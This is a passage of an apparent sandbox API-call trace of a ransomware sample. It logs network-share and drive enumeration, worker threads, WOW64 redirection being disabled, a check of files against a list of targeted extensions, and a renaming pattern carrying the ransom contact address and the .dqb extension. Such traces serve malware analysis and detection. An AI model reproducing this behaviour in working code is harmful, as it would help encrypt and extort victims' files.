lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) Thread: id = 87 os_tid = 0x568 [0265.276] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634a78 [0265.276] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634a78, Size=0x20) returned 0x619cb8 [0265.276] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619cb8, Size=0x40) returned 0x61ad20 [0265.276] GetLogicalDrives () returned 0x4 [0265.276] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x672d40 [0265.276] GetComputerNameW (in: lpBuffer=0x672d44, nSize=0x230ff6c | out: lpBuffer="XDUWTFONO", nSize=0x230ff6c) returned 1 [0265.276] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1000) returned 0x63da00 [0265.277] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x230ff3c | out: lphEnum=0x230ff3c*=0x61a398) returned 0x0 [0265.277] WNetEnumResourceW (in: hEnum=0x61a398, lpcCount=0x230ff38, lpBuffer=0x63da00, lpBufferSize=0x230ff40 | out: lpcCount=0x230ff38, lpBuffer=0x63da00, lpBufferSize=0x230ff40) returned 0x103 [0265.277] WNetCloseEnum (hEnum=0x61a398) returned 0x0 [0265.277] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x230ff3c | out: lphEnum=0x230ff3c*=0x653508) returned 0x0 [0268.587] WNetEnumResourceW (in: hEnum=0x653508, lpcCount=0x230ff38, lpBuffer=0x63da00, lpBufferSize=0x230ff40 | out: lpcCount=0x230ff38, lpBuffer=0x63da00, lpBufferSize=0x230ff40) returned 0x0 [0268.587] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1000) returned 0x653828 [0268.587] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x63da00, lphEnum=0x230ff10 | out: lphEnum=0x230ff10*=0x61a5b8) returned 0x0 [0268.893] WNetEnumResourceW (in: hEnum=0x61a5b8, lpcCount=0x230ff0c, lpBuffer=0x653828, lpBufferSize=0x230ff14 | out: lpcCount=0x230ff0c, lpBuffer=0x653828, lpBufferSize=0x230ff14) returned 0x103 [0268.893] WNetCloseEnum (hEnum=0x61a5b8) returned 0x0 [0268.893] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1000) returned 0x3af00c0 [0268.894] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x63da20, lphEnum=0x230ff10 | out: lphEnum=0x230ff10*=0x0) returned 0x4c6 [0269.583] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1000) returned 0x42250d8 [0269.583] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x63da40, lphEnum=0x230ff10 | out: lphEnum=0x230ff10*=0x0) returned 0x4c6 [0269.584] WNetEnumResourceW (in: hEnum=0x653508, lpcCount=0x230ff38, lpBuffer=0x63da00, lpBufferSize=0x230ff40 | out: lpcCount=0x230ff38, lpBuffer=0x63da00, lpBufferSize=0x230ff40) returned 0x103 [0269.584] WNetCloseEnum (hEnum=0x653508) returned 0x0 [0269.584] GetLogicalDrives () returned 0x4 [0269.584] Sleep (dwMilliseconds=0x64) [0270.056] GetLogicalDrives () returned 0x4 [0270.056] Sleep (dwMilliseconds=0x64) [0270.458] GetLogicalDrives () returned 0x4 [0270.459] Sleep (dwMilliseconds=0x64) [0271.051] GetLogicalDrives () returned 0x4 [0271.052] Sleep (dwMilliseconds=0x64) [0271.381] GetLogicalDrives () returned 0x4 [0271.381] Sleep (dwMilliseconds=0x64) [0271.707] GetLogicalDrives () returned 0x4 [0271.707] Sleep (dwMilliseconds=0x64) [0271.861] GetLogicalDrives () returned 0x4 [0271.861] Sleep (dwMilliseconds=0x64) [0272.022] GetLogicalDrives () returned 0x4 [0272.022] Sleep (dwMilliseconds=0x64) [0272.228] GetLogicalDrives () returned 0x4 [0272.228] Sleep (dwMilliseconds=0x64) [0272.381] GetLogicalDrives () returned 0x4 [0272.381] Sleep (dwMilliseconds=0x64) [0272.611] GetLogicalDrives () returned 0x4 [0272.611] Sleep (dwMilliseconds=0x64) [0272.862] GetLogicalDrives () returned 0x4 [0272.862] Sleep (dwMilliseconds=0x64) [0273.015] GetLogicalDrives () returned 0x4 [0273.015] Sleep (dwMilliseconds=0x64) [0273.234] GetLogicalDrives () returned 0x4 [0273.234] Sleep (dwMilliseconds=0x64) [0273.346] GetLogicalDrives () returned 0x4 [0273.346] Sleep (dwMilliseconds=0x64) [0273.475] GetLogicalDrives () returned 0x4 [0273.475] Sleep (dwMilliseconds=0x64) [0273.603] GetLogicalDrives () returned 0x4 [0273.603] Sleep (dwMilliseconds=0x64) [0273.721] GetLogicalDrives () returned 0x4 [0273.721] Sleep (dwMilliseconds=0x64) [0273.842] GetLogicalDrives () returned 0x4 [0273.842] Sleep (dwMilliseconds=0x64) [0273.977] GetLogicalDrives () returned 0x4 [0273.977] Sleep (dwMilliseconds=0x64) [0274.215] GetLogicalDrives () returned 0x4 [0274.215] Sleep (dwMilliseconds=0x64) [0274.325] GetLogicalDrives () returned 0x4 [0274.325] Sleep (dwMilliseconds=0x64) [0274.434] GetLogicalDrives () returned 0x4 [0274.434] Sleep (dwMilliseconds=0x64) [0274.537] GetLogicalDrives () returned 0x4 [0274.537] Sleep (dwMilliseconds=0x64) [0274.659] GetLogicalDrives () returned 0x4 [0274.659] Sleep (dwMilliseconds=0x64) [0274.952] GetLogicalDrives () returned 0x4 [0274.952] Sleep (dwMilliseconds=0x64) Thread: id = 88 os_tid = 0x56c [0268.187] GetTickCount () returned 0x7444 [0268.187] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x635290 [0268.187] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x635290, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0268.399] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x635290, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x138 [0268.401] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x635290, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x120 [0268.402] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x635290, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13c [0268.402] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634c40 [0268.403] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634c40, Size=0x20) returned 0x619e48 [0268.403] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634c40 [0268.403] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634c40, Size=0x20) returned 0x619e70 [0268.403] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0268.566] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0268.566] Wow64DisableWow64FsRedirection (in: OldValue=0x244ff84 | out: OldValue=0x244ff84*=0x0) returned 1 [0268.566] lstrlenW (lpString="kernel32.dll") returned 12 [0268.566] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619e48 | out: hHeap=0x5e0000) returned 1 [0268.566] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0268.566] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619e70 | out: hHeap=0x5e0000) returned 1 [0268.567] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x61ecf8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x160 [0268.568] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0268.949] GetTickCount () returned 0x7676 [0268.955] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0269.251] GetTickCount () returned 0x779e [0269.251] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0269.662] GetTickCount () returned 0x7944 [0269.662] GetTickCount () returned 0x7944 [0269.662] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0270.068] GetTickCount () returned 0x7aca [0270.068] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0270.459] GetTickCount () returned 0x7c50 [0270.459] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0271.051] GetTickCount () returned 0x7ea1 [0271.051] GetTickCount () returned 0x7ea1 [0271.051] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0271.381] GetTickCount () returned 0x7fe8 [0271.381] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0271.707] GetTickCount () returned 0x8130 [0271.707] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0271.861] GetTickCount () returned 0x81bc [0271.861] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0272.022] GetTickCount () returned 0x8268 [0272.022] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0272.227] GetTickCount () returned 0x8333 [0272.227] GetTickCount () returned 0x8333 [0272.227] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0272.381] GetTickCount () returned 0x83cf [0272.381] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0272.611] GetTickCount () returned 0x84b9 [0272.611] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0272.862] GetTickCount () returned 0x85b2 [0272.862] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0273.015] GetTickCount () returned 0x863f [0273.015] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0273.235] GetTickCount () returned 0x8729 [0273.235] GetTickCount () returned 0x8729 [0273.235] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0273.347] GetTickCount () returned 0x8796 [0273.347] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0273.475] GetTickCount () returned 0x8813 [0273.475] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0273.603] GetTickCount () returned 0x888f [0273.603] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0273.722] GetTickCount () returned 0x88fd [0273.722] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0273.842] GetTickCount () returned 0x8979 [0273.842] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0273.977] GetTickCount () returned 0x89f6 [0273.977] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0274.215] GetTickCount () returned 0x8ae0 [0274.215] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0274.325] GetTickCount () returned 0x8b4d [0274.325] GetTickCount () returned 0x8b4d [0274.325] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0274.434] GetTickCount () returned 0x8bbb [0274.434] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0274.536] GetTickCount () returned 0x8c18 [0274.536] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0274.659] GetTickCount () returned 0x8c95 [0274.659] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) returned 0x102 [0274.952] GetTickCount () returned 0x8dae [0274.952] WaitForSingleObject (hHandle=0x160, dwMilliseconds=0x64) Thread: id = 89 os_tid = 0x58c Thread: id = 90 os_tid = 0x570 [0268.565] GetTickCount () returned 0x74f0 [0268.565] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x63b468 [0268.566] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x63b468, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x15c [0268.567] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x63b468, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x164 [0268.569] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x63b468, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x16c [0268.570] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x63b468, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x170 [0268.572] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634c70 [0268.572] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634c70, Size=0x20) returned 0x619e70 [0268.572] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634c70 [0268.572] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634c70, Size=0x20) returned 0x619e48 [0268.573] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0268.587] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0268.587] Wow64DisableWow64FsRedirection (in: OldValue=0x258ff84 | out: OldValue=0x258ff84*=0x0) returned 1 [0268.587] lstrlenW (lpString="kernel32.dll") returned 12 [0268.587] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619e70 | out: hHeap=0x5e0000) returned 1 [0268.587] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0268.587] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619e48 | out: hHeap=0x5e0000) returned 1 [0268.587] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x662d20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x188 [0268.596] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0268.978] GetTickCount () returned 0x7695 [0268.978] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0269.251] GetTickCount () returned 0x779e [0269.251] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0269.661] GetTickCount () returned 0x7934 [0269.661] GetTickCount () returned 0x7944 [0269.662] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0270.067] GetTickCount () returned 0x7aba [0270.067] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0270.459] GetTickCount () returned 0x7c50 [0270.459] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0271.051] GetTickCount () returned 0x7ea1 [0271.051] GetTickCount () returned 0x7ea1 [0271.051] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0271.381] GetTickCount () returned 0x7fe8 [0271.381] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0271.707] GetTickCount () returned 0x8130 [0271.707] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0271.861] GetTickCount () returned 0x81bc [0271.861] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0272.022] GetTickCount () returned 0x8268 [0272.022] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0272.227] GetTickCount () returned 0x8333 [0272.227] GetTickCount () returned 0x8333 [0272.227] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0272.381] GetTickCount () returned 0x83cf [0272.381] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0272.611] GetTickCount () returned 0x84b9 [0272.611] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0272.862] GetTickCount () returned 0x85b2 [0272.862] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0273.015] GetTickCount () returned 0x863f [0273.015] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0273.235] GetTickCount () returned 0x8729 [0273.235] GetTickCount () returned 0x8729 [0273.235] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0273.347] GetTickCount () returned 0x8796 [0273.347] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0273.475] GetTickCount () returned 0x8813 [0273.475] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0273.603] GetTickCount () returned 0x888f [0273.603] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0273.722] GetTickCount () returned 0x88fd [0273.722] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0273.842] GetTickCount () returned 0x8979 [0273.842] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0273.977] GetTickCount () returned 0x89f6 [0273.977] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0274.215] GetTickCount () returned 0x8ae0 [0274.215] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0274.325] GetTickCount () returned 0x8b4d [0274.325] GetTickCount () returned 0x8b4d [0274.325] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0274.434] GetTickCount () returned 0x8bbb [0274.434] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0274.536] GetTickCount () returned 0x8c18 [0274.536] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0274.659] GetTickCount () returned 0x8c95 [0274.659] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) returned 0x102 [0274.952] GetTickCount () returned 0x8dae [0274.952] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x64) Thread: id = 93 os_tid = 0x660 [0268.596] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x682d48 [0268.596] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x692d50 [0268.597] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634e98 [0268.597] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x6619c0 [0268.597] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634eb0 [0268.597] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x37e0020 [0268.597] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634ec8 [0268.597] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634ec8, Size=0x20) returned 0x65b710 [0268.597] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634ec8 [0268.597] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634ec8, Size=0x20) returned 0x65b738 [0268.597] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0268.597] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0268.597] Wow64DisableWow64FsRedirection (in: OldValue=0x2c0ff58 | out: OldValue=0x2c0ff58*=0x0) returned 1 [0268.597] lstrlenW (lpString="kernel32.dll") returned 12 [0268.597] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b710 | out: hHeap=0x5e0000) returned 1 [0268.597] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0268.597] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b738 | out: hHeap=0x5e0000) returned 1 [0268.597] Sleep (dwMilliseconds=0x64) [0268.978] lstrcmpiW (lpString1=".ini", lpString2=".dqb") returned 1 [0268.979] lstrlenW (lpString="desktop.ini") returned 11 [0268.979] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0268.979] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=129) returned 1 [0268.979] CloseHandle (hObject=0x1c4) returned 1 [0268.979] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26 [0268.979] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0x26 [0268.979] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0268.979] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0268.979] lstrlenW (lpString=".doc") returned 4 [0268.979] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0268.979] lstrlenW (lpString=".docx") returned 5 [0268.979] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0268.979] lstrlenW (lpString=".pdf") returned 4 [0268.979] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0268.979] lstrlenW (lpString=".xls") returned 4 [0268.979] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0268.979] lstrlenW (lpString=".xlsx") returned 5 [0268.979] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0268.979] lstrlenW (lpString=".ppt") returned 4 [0268.979] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0268.979] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0268.979] lstrlenW (lpString=".zip") returned 4 [0268.979] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0268.980] lstrlenW (lpString=".rar") returned 4 [0268.980] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0268.980] lstrlenW (lpString=".bz2") returned 4 [0268.980] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0268.980] lstrlenW (lpString=".7z") returned 3 [0268.980] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0268.980] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0268.980] lstrlenW (lpString=".dbf") returned 4 [0268.980] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0268.980] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0268.980] lstrlenW (lpString=".1cd") returned 4 [0268.980] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0268.980] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0268.980] lstrlenW (lpString=".jpg") returned 4 [0268.980] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0268.980] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0268.980] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0268.980] lstrlenW (lpString=".doc") returned 4 [0268.980] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0268.980] lstrlenW (lpString=".docx") returned 5 [0268.980] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0268.980] lstrlenW (lpString=".pdf") returned 4 [0268.980] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0268.980] lstrlenW (lpString=".xls") returned 4 [0268.980] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0268.980] lstrlenW (lpString=".xlsx") returned 5 [0268.980] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0268.980] lstrlenW (lpString=".ppt") returned 4 [0268.980] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0268.980] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0268.980] lstrlenW (lpString=".zip") returned 4 [0268.980] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0268.980] lstrlenW (lpString=".rar") returned 4 [0268.981] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0268.981] lstrlenW (lpString=".bz2") returned 4 [0268.981] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0268.981] lstrlenW (lpString=".7z") returned 3 [0268.981] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0268.981] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0268.981] lstrlenW (lpString=".dbf") returned 4 [0268.981] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0268.981] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0268.981] lstrlenW (lpString=".1cd") returned 4 [0268.981] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0268.981] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0268.981] lstrlenW (lpString=".jpg") returned 4 [0268.981] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0268.981] lstrcmpiW (lpString1=".LOG", lpString2=".dqb") returned 1 [0268.981] lstrlenW (lpString="BCD.LOG") returned 7 [0268.981] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0268.981] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0268.981] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0268.981] lstrlenW (lpString=".doc") returned 4 [0268.981] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0268.981] lstrlenW (lpString=".docx") returned 5 [0268.981] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0268.981] lstrlenW (lpString=".pdf") returned 4 [0268.981] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0268.981] lstrlenW (lpString=".xls") returned 4 [0268.981] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0268.981] lstrlenW (lpString=".xlsx") returned 5 [0268.981] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0268.982] lstrlenW (lpString=".ppt") returned 4 [0268.982] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0268.982] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0268.982] lstrlenW (lpString=".zip") returned 4 [0268.982] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0268.982] lstrlenW (lpString=".rar") returned 4 [0268.982] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0268.982] lstrlenW (lpString=".bz2") returned 4 [0268.982] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0268.982] lstrlenW (lpString=".7z") returned 3 [0268.982] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0268.982] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0268.982] lstrlenW (lpString=".dbf") returned 4 [0268.982] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0268.982] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0268.982] lstrlenW (lpString=".1cd") returned 4 [0268.982] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0268.982] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0268.982] 